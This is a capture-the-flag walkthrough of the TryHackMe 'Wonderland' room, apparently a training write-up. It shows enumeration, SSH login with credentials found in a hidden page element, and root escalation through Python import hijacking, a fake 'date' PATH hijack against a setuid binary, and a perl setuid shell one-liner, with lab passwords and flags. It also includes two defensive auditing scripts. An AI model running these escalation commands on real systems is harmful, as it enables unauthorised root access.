THM - Wonderland machine walkthrough
Fall down the rabbit hole and enter wonderland.
Room address
Background
Enter Wonderland and capture the flags.
Machine type
Free room
Completion conditions
- Obtain the flag in user.txt
- Escalate your privileges, what is the flag in root.txt?
Penetration process
Basic information
Attacker IP: 10.11.74.107
Target IP: 10.10.148.93
Port scan with Nmap
Output
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
[*] Nmap: | ssh-hostkey:
[*] Nmap: | 2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)
[*] Nmap: | 256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)
[*] Nmap: |_ 256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (ED25519)
[*] Nmap: 80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
[*] Nmap: |_http-title: Follow the white rabbit.
[*] Nmap: | http-methods:
[*] Nmap: |_ Supported Methods: GET HEAD POST OPTIONS
[*] Nmap: No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
[*] Nmap: TCP/IP fingerprint:
[*] Nmap: Uptime guess: 11.971 days (since Sat Mar 2 16:45:28 2024)
[*] Nmap: Network Distance: 2 hops
[*] Nmap: TCP Sequence Prediction: Difficulty=262 (Good luck!)
[*] Nmap: IP ID Sequence Generation: All zeros
[*] Nmap: Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
[*] Nmap: TRACEROUTE (using port 554/tcp)
- Summary
- Operating system: Linux
- Open ports: 22, 80
Connect to the web service
Page source
<!DOCTYPE html>
<head>
<title>Follow the white rabbit.</title>
<link rel="stylesheet" type="text/css" href="/main.css">
</head>
<body>
<h1>Follow the White Rabbit.</h1>
<p>"Curiouser and curiouser!" cried Alice (she was so much surprised, that for the moment she quite forgot how to speak good English)</p>
<img src="/img/white_rabbit_1.jpg" style="height: 50rem;">
</body>
The img directory may have something in it, but let's brute-force directories first.
Directory brute-forcing with gobuster
Output
┌──(kali㉿kali)-[~/Desktop]
└─$ gobuster dir --url http://10.10.148.93 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.148.93
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/img (Status: 301) [Size: 0] [--> img/]
/index.html (Status: 301) [Size: 0] [--> ./]
/r (Status: 301) [Size: 0] [--> r/]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
There are an img directory and an r directory.
Check the contents of the img directory
Source
<pre>
<a href="alice_door.jpg">alice_door.jpg</a>
<a href="alice_door.png">alice_door.png</a>
<a href="white_rabbit_1.jpg">white_rabbit_1.jpg</a>
</pre>
There is nothing special in the source either.
I downloaded the three images to my machine.
Use steghide to check whether anything is hidden in them
white_rabbit_1.jpg
┌──(kali㉿kali)-[~/Desktop]
└─$ steghide info white_rabbit_1.jpg
"white_rabbit_1.jpg":
format: jpeg
capacity: 99.2 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
embedded file "hint.txt":
size: 22.0 Byte
encrypted: rijndael-128, cbc
compressed: yes
white_rabbit_1.jpg has hint.txt embedded in it, and it can be retrieved without a passphrase.
Extract it with the following command
This yields a file hint.txt; its content seems to be hinting at something....
alice_door.jpg
┌──(kali㉿kali)-[~/Desktop]
└─$ steghide info alice_door.jpg
"alice_door.jpg":
format: jpeg
capacity: 68.9 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
steghide: could not extract any data with that passphrase!
alice_door.jpg contains an embedded file but requires a passphrase. Keep this clue for now; if no other clues turn up, brute-force it later.
alice_door.png
┌──(kali㉿kali)-[~/Desktop]
└─$ steghide info alice_door.png
steghide: the file format of the file "alice_door.png" is not supported.
alice_door.png has nothing in it at all.
Back to the web page for further inspection
Earlier we obtained the following information
gobuster also found an r directory, and I wondered whether the final link would be the following. After opening it in the browser I got the page below, but there seemed to be no further clues on it.
I looked at the page source
Page source
<head>
<title>Enter wonderland</title>
<link rel="stylesheet" type="text/css" href="/main.css">
</head>
<body>
<h1>Open the door and enter wonderland</h1>
<p>"Oh, you’re sure to do that," said the Cat, "if you only walk long enough."</p>
<p>Alice felt that this could not be denied, so she tried another question. "What sort of people live about here?"
</p>
<p>"In that direction,"" the Cat said, waving its right paw round, "lives a Hatter: and in that direction," waving
the other paw, "lives a March Hare. Visit either you like: they’re both mad."</p>
<p style="display: none;">alice:HowDothTheLittleCrocodileImproveHisShiningTail</p>
<img src="/img/alice_door.png" style="height: 50rem;">
</body>
I wondered:
could alice:HowDothTheLittleCrocodileImproveHisShiningTail actually be the SSH credentials?
Log in via SSH
Log in to SSH using MSF
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > show options
Module options (auxiliary/scanner/ssh/ssh_login):
Name Current Setting Required Description
---- --------------- -------- -----------
ANONYMOUS_LOGIN false yes Attempt to login with a blank username and password
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current data
base
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DB_SKIP_EXISTING none no Skip existing credentials stored in the current database
(Accepted: none, user, user&realm)
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs
/using-metasploit/basics/using-metasploit.html
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space,
one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE false yes Whether to print output for all attempts
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/ssh/ssh_login) > set USERNAME alice
USERNAME => alice
msf6 auxiliary(scanner/ssh/ssh_login) > set PASSWORD HowDothTheLittleCrocodileImproveHisShiningTail
PASSWORD => HowDothTheLittleCrocodileImproveHisShiningTail
msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 10.10.148.93
RHOSTS => 10.10.148.93
msf6 auxiliary(scanner/ssh/ssh_login) > run
[*] 10.10.148.93:22 - Starting bruteforce
[+] 10.10.148.93:22 - Success: 'alice:HowDothTheLittleCrocodileImproveHisShiningTail' 'uid=1001(alice) gid=1001(alice) groups=1001(alice) Linux wonderland 4.15.0-101-generic #102-Ubuntu SMP Mon May 11 10:07:26 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux '
[*] SSH session 1 opened (10.11.74.107:40365 -> 10.10.148.93:22) at 2020-06-20 23:10:18 +0800
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_login) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell linux SSH kali @ 10.11.74.107:40365 -> 10.10.148.93:22 (10.10.148.93)
Looks like the login succeeded and we have a session. Before looking for the flags, I run linPEAS first to see whether any interesting clues can be collected.
Users
alice:x:1001:1001:Alice Liddell,,,:/home/alice:/bin/bash
hatter:x:1003:1003:Mad Hatter,,,:/home/hatter:/bin/bash
rabbit:x:1002:1002:White Rabbit,,,:/home/rabbit:/bin/bash
root:x:0:0:root:/root:/bin/bash
tryhackme:x:1000:1000:tryhackme:/home/tryhackme:/bin/bash
Current user's sudo privileges
Sudoers file: /etc/sudoers.d/alice is readable
alice ALL = (rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
Capabilities that might be usable for privilege escalation
Files with capabilities (limited to 50):
/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep
Although a capability usable for privilege escalation was found, I have no permission to run perl. Now check what is in alice's home directory.
- Contents:
root.txt cannot be opened (no permission); walrus_and_the_carpenter.py is readable and executable but not editable, and according to the information collected earlier, sudo allows running it as rabbit.
First look at the contents of walrus_and_the_carpenter.py
walrus_and_the_carpenter.py
This is a simple Python script: it randomly picks 10 lines from the poem and prints them, and it begins with import random.
import random
poem = """The sun was shining on the sea,
Shining with all his might:
He did his very best to make
The billows smooth and bright —
And this was odd, because it was
The middle of the night.
The moon was shining sulkily,
Because she thought the sun
Had got no business to be there
After the day was done —
"It’s very rude of him," she said,
"To come and spoil the fun!"
The sea was wet as wet could be,
The sands were dry as dry.
You could not see a cloud, because
No cloud was in the sky:
No birds were flying over head —
There were no birds to fly.
The Walrus and the Carpenter
Were walking close at hand;
They wept like anything to see
Such quantities of sand:
"If this were only cleared away,"
They said, "it would be grand!"
"If seven maids with seven mops
Swept it for half a year,
Do you suppose," the Walrus said,
"That they could get it clear?"
"I doubt it," said the Carpenter,
And shed a bitter tear.
"O Oysters, come and walk with us!"
The Walrus did beseech.
"A pleasant walk, a pleasant talk,
Along the briny beach:
We cannot do with more than four,
To give a hand to each."
The eldest Oyster looked at him.
But never a word he said:
The eldest Oyster winked his eye,
And shook his heavy head —
Meaning to say he did not choose
To leave the oyster-bed.
But four young oysters hurried up,
All eager for the treat:
Their coats were brushed, their faces washed,
Their shoes were clean and neat —
And this was odd, because, you know,
They hadn’t any feet.
Four other Oysters followed them,
And yet another four;
And thick and fast they came at last,
And more, and more, and more —
All hopping through the frothy waves,
And scrambling to the shore.
The Walrus and the Carpenter
Walked on a mile or so,
And then they rested on a rock
Conveniently low:
And all the little Oysters stood
And waited in a row.
"The time has come," the Walrus said,
"To talk of many things:
Of shoes — and ships — and sealing-wax —
Of cabbages — and kings —
And why the sea is boiling hot —
And whether pigs have wings."
"But wait a bit," the Oysters cried,
"Before we have our chat;
For some of us are out of breath,
And all of us are fat!"
"No hurry!" said the Carpenter.
They thanked him much for that.
"A loaf of bread," the Walrus said,
"Is what we chiefly need:
Pepper and vinegar besides
Are very good indeed —
Now if you’re ready Oysters dear,
We can begin to feed."
"But not on us!" the Oysters cried,
Turning a little blue,
"After such kindness, that would be
A dismal thing to do!"
"The night is fine," the Walrus said
"Do you admire the view?
"It was so kind of you to come!
And you are very nice!"
The Carpenter said nothing but
"Cut us another slice:
I wish you were not quite so deaf —
I’ve had to ask you twice!"
"It seems a shame," the Walrus said,
"To play them such a trick,
After we’ve brought them out so far,
And made them trot so quick!"
The Carpenter said nothing but
"The butter’s spread too thick!"
"I weep for you," the Walrus said.
"I deeply sympathize."
With sobs and tears he sorted out
Those of the largest size.
Holding his pocket handkerchief
Before his streaming eyes.
"O Oysters," said the Carpenter.
"You’ve had a pleasant run!
Shall we be trotting home again?"
But answer came there none —
And that was scarcely odd, because
They’d eaten every one."""
for i in range(10):
    line = random.choice(poem.split("\n"))
    print("The line was:\t", line)
Because of import random, I can probably create a random.py in the script's directory so that it loads mine instead of the built-in random module.
Write a short piece of code and have it executed as rabbit to obtain rabbit's privileges.
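As an added example (not code from the original write-up), the following audit captures the condition above for any sudoers rule of this shape: it lists the script's imports, checks whether the rule's user can write the script's directory, and reports shadow files already present. The uid/gid are passed in as numbers so it runs offline, and the rule path quoted in the docstring is the one from this page.

```python
"""Audit a sudo-permitted Python script for import hijacking.

Added example, not part of the original write-up.  For a rule such as
    alice ALL = (rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
CPython puts the script's own directory first on sys.path, so any module the
script imports can be replaced by a same-named file beside it.  The audit
reports whether the rule's user (given as uid/gid so it runs offline) can write
that directory and which imports are already shadowed.
"""
import ast
import stat
from pathlib import Path


def imported_modules(source: str) -> set[str]:
    """Top-level module names from 'import x' / 'from x import y' statements."""
    mods: set[str] = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            mods.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            mods.add(node.module.split(".")[0])
    return mods


def writable_by(path: Path, uid: int, gid: int) -> bool:
    """Mode-bit check: may a non-root user with uid/gid create files in path?"""
    st = path.stat()
    if st.st_uid == uid:
        return bool(st.st_mode & stat.S_IWUSR)
    if st.st_gid == gid:
        return bool(st.st_mode & stat.S_IWGRP)
    return bool(st.st_mode & stat.S_IWOTH)


def audit_script(script: Path, uid: int, gid: int) -> dict:
    """Findings for one sudoers rule that runs `python3 script` for uid/gid."""
    script = script.resolve()
    src_dir = script.parent
    mods = imported_modules(script.read_text())
    shadowed = sorted(m for m in mods
                      if (src_dir / f"{m}.py").is_file()
                      or (src_dir / m / "__init__.py").is_file())
    dir_writable = writable_by(src_dir, uid, gid)
    return {
        "imports": sorted(mods),
        "shadowed": shadowed,
        "dir_writable_by_user": dir_writable,
        # Fix: run the script with `python3 -I` (isolated mode leaves the script
        # directory off sys.path) or keep it in a directory the user cannot write.
        "hijackable": bool(mods) and (dir_writable or bool(shadowed)),
    }
```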
After obtaining rabbit's privileges, I went into rabbit's home directory and found a file with the setuid bit set.
rabbit@wonderland:/home/rabbit$ ls -al
ls -al
total 40
drwxr-x--- 2 rabbit rabbit 4096 May 25 2020 .
drwxr-xr-x 6 root root 4096 May 25 2020 ..
lrwxrwxrwx 1 root root 9 May 25 2020 .bash_history -> /dev/null
-rw-r--r-- 1 rabbit rabbit 220 May 25 2020 .bash_logout
-rw-r--r-- 1 rabbit rabbit 3771 May 25 2020 .bashrc
-rw-r--r-- 1 rabbit rabbit 807 May 25 2020 .profile
-rwsr-sr-x 1 root root 16816 May 25 2020 teaParty
rabbit@wonderland:/home/rabbit$ python3 -m http.server 8000
python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Examine the teaParty file with strings
┌──(kali㉿kali)-[~/Desktop]
└─$ strings teaParty
/lib64/ld-linux-x86-64.so.2
2U~4
libc.so.6
setuid
puts
getchar
system
__cxa_finalize
setgid
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
Welcome to the tea party!
The Mad Hatter will be here soon.
/bin/echo -n 'Probably by ' && date --date='next hour' -R
Ask very nicely, and I will give you some tea while you wait for him
Segmentation fault (core dumped)
;*3$"
GCC: (Debian 8.3.0-6) 8.3.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.7325
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
teaParty.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
puts@@GLIBC_2.2.5
_edata
system@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
getchar@@GLIBC_2.2.5
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
setgid@@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
setuid@@GLIBC_2.2.5
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment
date is called without an absolute path, so create a fake one for it
echo '#!/bin/bash' >> date
echo '/bin/bash' >> date
chmod +x date
export PATH=/home/rabbit:$PATH # put this directory at the front of PATH
Execution result
Now run it:
rabbit@wonderland:/home/rabbit$ ./teaParty
./teaParty
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by hatter@wonderland:/home/rabbit$ whoami
whoami
hatter
hatter@wonderland:/home/rabbit$
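The PATH hijack works because the command embedded in teaParty names date without a path. As an added example (not from the original write-up), the following checker mimics strings on a binary and flags command words in embedded shell strings that will be resolved through PATH; the byte blob it scans is constructed from the strings shown above, with a hardened /bin/date variant for contrast.

```python
"""Flag shell commands embedded in a binary that depend on PATH lookup.

Added example, not code from the original write-up.  teaParty runs
    /bin/echo -n 'Probably by ' && date --date='next hour' -R
via system() while setuid; `date` has no '/', so whichever `date` comes first
on the caller's PATH runs with the elevated identity.  This mimics strings(1)
on raw bytes and reports command words that are not absolute paths.
"""
import re
import shlex

SEPARATORS = {"&&", "||", ";", "|", "&"}


def extract_strings(blob: bytes, min_len: int = 4) -> list[str]:
    """Printable ASCII runs of at least min_len bytes, like strings(1)."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode() for m in re.finditer(pattern, blob)]


def unqualified_commands(text: str) -> list[str]:
    """Command words (first of each list/pipeline element) lacking a '/'."""
    # Heuristic: only strings starting with an absolute path or containing a
    # shell operator are treated as command lines.
    lex = shlex.shlex(text, posix=True, punctuation_chars=True)
    lex.whitespace_split = True          # keep '--date=next hour' as one token
    try:
        tokens = list(lex)
    except ValueError:                   # unbalanced quote, e.g. the string ;*3$"
        return []
    if not tokens or not (tokens[0].startswith("/") or SEPARATORS & set(tokens)):
        return []
    found, expect_command = [], True
    for tok in tokens:
        if tok in SEPARATORS:
            expect_command = True
        elif expect_command:
            if not tok.startswith("/"):
                found.append(tok)
            expect_command = False
    return found


def audit_binary(blob: bytes) -> dict[str, list[str]]:
    """Map each embedded command string to its PATH-dependent command words."""
    return {s: w for s in extract_strings(blob) if (w := unqualified_commands(s))}


# Constructed stand-in for teaParty (not the real file): ELF-ish bytes, the
# program's messages, the vulnerable command and a hardened variant.
SAMPLE_BLOB = (
    b"\x7fELF\x02\x01\x01" + b"\x00" * 9
    + b"setuid\x00puts\x00getchar\x00system\x00"
    b"Welcome to the tea party!\x00The Mad Hatter will be here soon.\x00"
    b"/bin/echo -n 'Probably by ' && date --date='next hour' -R\x00"
    b"/bin/echo -n 'Probably by ' && /bin/date --date='next hour' -R\x00"
    b";*3$\"\x00"
)
```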
The id command tells me that my gid is still rabbit's.
The capability found earlier for privilege escalation is set on perl, and perl is owned by root with group hatter, so the gid must be hatter to use it. However, I found a password-like file in /home/hatter.
Checking perl's permissions
hatter@wonderland:/home/hatter:~$ find /usr/bin/perl -exec ls -l {} \;
find /usr/bin/perl -exec ls -l {} \;
-rwxr-xr-- 2 root hatter 2097720 Nov 19 2018 /usr/bin/perl
hatter@wonderland:/home/hatter$ ls -al
ls -al
total 28
drwxr-x--- 3 hatter hatter 4096 May 25 2020 .
drwxr-xr-x 6 root root 4096 May 25 2020 ..
lrwxrwxrwx 1 root root 9 May 25 2020 .bash_history -> /dev/null
-rw-r--r-- 1 hatter hatter 220 May 25 2020 .bash_logout
-rw-r--r-- 1 hatter hatter 3771 May 25 2020 .bashrc
drwxrwxr-x 3 hatter hatter 4096 May 25 2020 .local
-rw-r--r-- 1 hatter hatter 807 May 25 2020 .profile
-rw------- 1 hatter hatter 29 May 25 2020 password.txt
hatter@wonderland:/home/hatter$ cat password.txt
cat password.txt
WhyIsARavenLikeAWritingDesk?
Switch identity again with su hatter; now perl can be used normally.
Obtain root.txt and user.txt
After obtaining full hatter privileges, run the following command to switch to root.
Then go to /home/alice and read root.txt, whose contents we could not read before. Output:
hatter@wonderland:/home/alice$ /usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
# whoami
root
# ls -al
total 68
drwxr-xr-x 6 alice alice 4096 Mar 14 16:51 .
drwxr-xr-x 6 root root 4096 May 25 2020 ..
lrwxrwxrwx 1 root root 9 May 25 2020 .bash_history -> /dev/null
-rw-r--r-- 1 alice alice 220 May 25 2020 .bash_logout
-rw-r--r-- 1 alice alice 3771 May 25 2020 .bashrc
drwx------ 2 alice alice 4096 May 25 2020 .cache
drwxr-x--- 3 alice alice 4096 Mar 14 15:18 .config
drwx------ 3 alice alice 4096 Mar 14 15:18 .gnupg
drwxrwxr-x 3 alice alice 4096 May 25 2020 .local
-rw-r--r-- 1 alice alice 807 May 25 2020 .profile
-rw------- 1 alice alice 38 Mar 14 16:07 .python_history
-rw-r--r-- 1 alice alice 12288 Mar 14 16:46 .random.py.swp
-rw------- 1 alice alice 967 Mar 14 16:51 .viminfo
-rw-rw-r-- 1 alice alice 33 Mar 14 16:51 random.py
-rw------- 1 root root 66 May 25 2020 root.txt
-rw-r--r-- 1 root root 3577 May 25 2020 walrus_and_the_carpenter.py
# cat root.txt
thm{Twinkle, twinkle, little bat! How I wonder what you’re at!}
The contents of user.txt, in turn, are found in the /root directory.
Output
# cd /root
# ls -al
total 28
drwx--x--x 4 root root 4096 May 25 2020 .
drwxr-xr-x 23 root root 4096 May 25 2020 ..
lrwxrwxrwx 1 root root 9 May 25 2020 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc
drwxr-xr-x 3 root root 4096 May 25 2020 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
drwx------ 2 root root 4096 May 25 2020 .ssh
-rw-r--r-- 1 root root 32 May 25 2020 user.txt
# cat user.txt
thm{"Curiouser and curiouser!"}


